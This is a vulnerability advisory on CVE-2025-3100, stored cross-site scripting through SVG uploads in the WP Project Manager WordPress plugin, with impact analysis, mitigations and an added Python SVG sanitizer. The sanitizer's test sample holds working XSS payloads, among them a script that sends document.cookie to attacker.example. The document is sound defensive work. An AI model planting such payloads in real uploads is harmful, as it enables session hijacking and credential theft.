CVE-2025-3100 in WP Project Manager Plugin
Summary
by MITRE • 04/09/2025
The WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22 due to insufficient input sanitization and output escaping in tasks discussion. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an Administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
Analysis
by VulDB Data Team • 04/09/2025
The vulnerability identified as CVE-2025-3100 affects the WP Project Manager plugin for WordPress, a project management solution that includes features such as kanban boards and gantt charts. The plugin contains a stored cross-site scripting flaw in all versions up to and including 2.6.22. The flaw stems from inadequate input sanitization and output escaping within the task discussion functionality, where SVG file uploads are accepted. An authenticated attacker with as little as Subscriber-level access, provided an Administrator has granted that account the plugin permission needed to participate in task discussions, can upload an SVG file carrying script. The file persists on the server and the script executes in the browser of any user who later opens it.
The technical nature of this vulnerability aligns with CWE-79 (Improper Neutralization of Input During Web Page Generation, i.e. Cross-Site Scripting) and shows how insufficient input validation and output escaping create opportunities for persistent script injection. The plugin does not sanitize the content of an uploaded SVG before storing it on the server, and does not serve the stored file in a way that prevents script execution. An SVG is an XML document, not a bitmap: it may contain <script> elements, event-handler attributes such as onload, javascript: hrefs and <foreignObject> wrappers around arbitrary HTML. A browser runs that script whenever the SVG is loaded as a document, which is what happens when a user navigates to the file's URL directly or when it is embedded via <object> or <iframe>; script does not run when an SVG is displayed through an <img> tag or a CSS background. The attack vector is particularly concerning because SVG files are often treated as ordinary images and may pass filters that would otherwise block script-bearing uploads.
The operational impact of this vulnerability extends beyond simple script execution, because it creates a privilege escalation path within the WordPress environment. When the uploads directory is served from the same origin as the WordPress site, the injected script runs in that origin and therefore acts with the cookies and session of whoever opened the file. An attacker with Subscriber-level access can use this to steal sessions, redirect users to malicious sites, harvest credentials, or issue authenticated requests to the site on the victim's behalf. Because the XSS is stored, the script remains on the server and fires for every user who accesses the compromised SVG, which makes it especially dangerous in collaborative environments where many users, including administrators, review project management data. The flaw thus undermines the WordPress privilege model by letting a low-privilege account compromise higher-privilege users through the plugin's discussion feature.
Mitigation for CVE-2025-3100 starts with updating to the latest version of the WP Project Manager plugin, in which the vendor addresses the issue through proper input sanitization and output escaping. Organizations should also apply defense in depth: restrict upload capabilities to trusted roles, keep SVG uploads disabled where they are not needed (WordPress core does not permit image/svg+xml uploads by default; plugins have to enable them), sanitize any SVG that is accepted by stripping script elements, event-handler attributes, javascript: and data: URLs and foreignObject content, and serve the uploads directory with headers that neutralize inline script, for example a Content-Security-Policy with a restrictive script-src or a sandbox directive, or Content-Disposition: attachment for SVG so the browser downloads rather than renders it. The vulnerability illustrates the input validation and output escaping guidance behind the OWASP Top Ten's Injection category (A03:2021), under which cross-site scripting falls. In ATT&CK terms the closest fit is T1059.007 (Command and Scripting Interpreter: JavaScript), since the payload is script executed in the victim's browser; T1566.001, sometimes cited for this advisory, is Spearphishing Attachment and does not describe a web upload. Security teams should also audit files already present in the uploads directory, and keep monitoring plugin updates and security advisories for third-party WordPress plugins, since similar SVG upload flaws recur across the ecosystem.
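The following is an added example, not code from the WP Project Manager plugin or from VulDB, showing the SVG content validation described above and the payload shapes discussed in the analysis: a Python sanitizer that parses an uploaded SVG as XML and removes script elements, SMIL animations that could rewrite an href to javascript:, foreignObject wrappers, on* event-handler attributes and non-http(s) URLs. The two SVG inputs are constructed for the example; the function names, the decision to block data: URLs and the reject-on-any-finding policy in is_safe_svg are this example's own choices, not the plugin's.

```python
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that can run script or smuggle arbitrary HTML into the SVG document.
FORBIDDEN_ELEMENTS = {"script", "foreignObject"}
# Attributes (by local name, so xlink:href is covered) that may carry a URL.
URL_ATTRIBUTES = {"href", "src"}


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def _unsafe_url(value: str) -> bool:
    # Browsers ignore whitespace and control characters inside a scheme,
    # so "java\tscript:" still runs; normalise before inspecting it.
    compact = re.sub(r"[\s\x00-\x1f]", "", value).lower()
    if ":" not in compact:
        return False  # fragment (#id) or relative path
    # Policy choice for this example: only http(s) is allowed, data: is blocked.
    return not (compact.startswith("http:") or compact.startswith("https:"))


def sanitize_svg(data: bytes) -> tuple[bytes, list[str]]:
    """Return (sanitized SVG bytes, list of what was removed).

    Raises ValueError for input that should simply be rejected.
    """
    # A DOCTYPE is never needed in an uploaded icon; refusing it also closes
    # entity-expansion tricks before the parser sees them.
    if re.search(rb"<!DOCTYPE|<!ENTITY", data, re.IGNORECASE):
        raise ValueError("DOCTYPE/ENTITY declarations are not allowed in an uploaded SVG")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        raise ValueError(f"not well-formed XML: {exc}") from exc
    if root.tag != f"{{{SVG_NS}}}svg":
        raise ValueError("root element is not an SVG <svg>")

    removed: list[str] = []

    # Pass 1: drop dangerous elements. Walk a snapshot because the tree is
    # modified during the walk.
    for parent in list(root.iter()):
        for child in list(parent):
            name = _local(child.tag)
            if name in FORBIDDEN_ELEMENTS:
                parent.remove(child)
                removed.append(f"element <{name}>")
            elif name in {"animate", "set"} and child.get("attributeName", "") in {"href", "xlink:href"}:
                # SMIL can rewrite a harmless href to javascript: after load.
                parent.remove(child)
                removed.append(f"element <{name} attributeName=href>")

    # Pass 2: strip event handlers and script-carrying URLs on what is left.
    for el in root.iter():
        for attr, value in list(el.attrib.items()):
            name = _local(attr)
            if name.lower().startswith("on"):
                del el.attrib[attr]
                removed.append(f"attribute {name} on <{_local(el.tag)}>")
            elif name in URL_ATTRIBUTES and _unsafe_url(value):
                del el.attrib[attr]
                removed.append(f"attribute {name}={value!r} on <{_local(el.tag)}>")

    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="utf-8"), removed


def is_safe_svg(data: bytes) -> bool:
    """Reject-don't-repair policy: accept an upload only if nothing had to be removed."""
    try:
        return not sanitize_svg(data)[1]
    except ValueError:
        return False


# Constructed sample: the payload shapes an attacker hides in a "harmless" image.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="alert(document.domain)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <circle cx="50" cy="50" r="40" fill="green"/>
  <a xlink:href="java&#9;script:alert(1)"><text x="10" y="20">click</text></a>
  <a><animate attributeName="href" values="javascript:alert(2)"/><rect width="10" height="10"/></a>
  <foreignObject width="100" height="100">
    <body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(3)"/></body>
  </foreignObject>
</svg>"""

# Constructed sample: an ordinary icon with an in-document link.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <a href="#details"><rect width="10" height="10" fill="#336"/></a>
</svg>"""

if __name__ == "__main__":
    clean, findings = sanitize_svg(MALICIOUS_SVG)
    for f in findings:
        print("removed:", f)
    print(clean.decode())
    print("benign accepted:", is_safe_svg(BENIGN_SVG))
```

For an upload hook the reject policy in is_safe_svg is the better default: an attacker who can reach the sanitizer will probe for bypasses, and refusing the file gives nothing to probe. The sanitized output is still useful for review tooling and for cleaning files already on disk. Note what this example deliberately leaves alone: <style> elements are kept, and a stricter policy would drop them as well; and the parser-level checks do not replace serving the uploads directory with a Content-Security-Policy or Content-Disposition: attachment, which protect even files that slipped past validation.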